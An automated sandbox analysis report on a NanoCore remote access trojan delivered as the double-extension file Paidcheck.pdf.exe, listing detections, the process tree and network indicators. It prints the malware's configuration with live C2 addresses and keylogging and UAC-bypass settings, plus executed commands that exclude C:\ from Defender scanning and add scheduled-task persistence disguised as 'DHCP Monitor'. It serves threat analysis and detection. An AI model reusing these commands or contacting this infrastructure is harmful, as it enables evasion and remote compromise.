Loading ...

Play interactive tourEdit tour

Windows Analysis Report Paidcheck.pdf.exe

Overview

General Information

Sample Name:Paidcheck.pdf.exe
Analysis ID:452385
MD5:ce32e8605adb6c9bb2dcee69fe887b46
SHA1:2ace1fb1e3523768003b61a4a79193214ffafed9
SHA256:7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Paidcheck.pdf.exe (PID: 4608 cmdline: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' MD5: CE32E8605ADB6C9BB2DCEE69FE887B46)
    • wscript.exe (PID: 1968 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 2308 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 5636 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5848 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 5432 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 496 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 4300 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x59eb:$x1: NanoCore.ClientPluginHost
    • 0x5b48:$x2: IClientNetworkHost
    0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0x59eb:$x2: NanoCore.ClientPluginHost
    • 0x6941:$s3: PipeExists
    • 0x5be1:$s4: PipeCreated
    • 0x5a05:$s5: IClientLoggingHost
    0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      Click to see the 44 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.RegAsm.exe.6aa0000.26.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x16e3:$x1: NanoCore.ClientPluginHost
      • 0x171c:$x2: IClientNetworkHost
      10.2.RegAsm.exe.6aa0000.26.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x16e3:$x2: NanoCore.ClientPluginHost
      • 0x1800:$s4: PipeCreated
      • 0x16fd:$s5: IClientLoggingHost
      10.2.RegAsm.exe.6af0000.31.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      10.2.RegAsm.exe.6af0000.31.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x39eb:$x2: NanoCore.ClientPluginHost
      • 0x3b36:$s4: PipeCreated
      • 0x3a05:$s5: IClientLoggingHost
      10.2.RegAsm.exe.6540000.24.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x4bbb:$x1: NanoCore.ClientPluginHost
      • 0x4be5:$x2: IClientNetworkHost
      Click to see the 148 entries

      Sigma Overview

      AV Detection:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      System Summary:

      barindex
      Sigma detected: Suspicious Process Start Without DLLShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308
      Sigma detected: Suspicious Script Execution From Temp FolderShow sources
      Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
      Sigma detected: WScript or CScript DropperShow sources
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1968, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', ProcessId: 748
      Sigma detected: Possible Applocker BypassShow sources
      Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308

      Stealing of Sensitive Information:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus / Scanner detection for submitted sampleShow sources
      Source: Paidcheck.pdf.exeAvira: detected
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeAvira: detection malicious, Label: HEUR/AGEN.1118541
      Found malware configurationShow sources
      Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeReversingLabs: Detection: 32%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: Paidcheck.pdf.exeJoe Sandbox ML: detected
      Source: 10.2.RegAsm.exe.5f60000.23.unpackAvira: Label: TR/NanoCore.fadte
      Source: 10.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: Paidcheck.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: Paidcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 217.138.212.57:2018
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: annapro.linkpc.net
      Source: Malware configuration extractorURLs: 217.138.212.57
      Source: global trafficTCP traffic: 192.168.2.3:49704 -> 217.138.212.57:2018
      Source: Joe Sandbox ViewASN Name: M247GB M247GB
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: unknownTCP traffic detected without corresponding DNS query: 217.138.212.57
      Source: powershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpString found in binary or memory: http://crl.microso
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsofX
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpString found in binary or memory: http://google.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
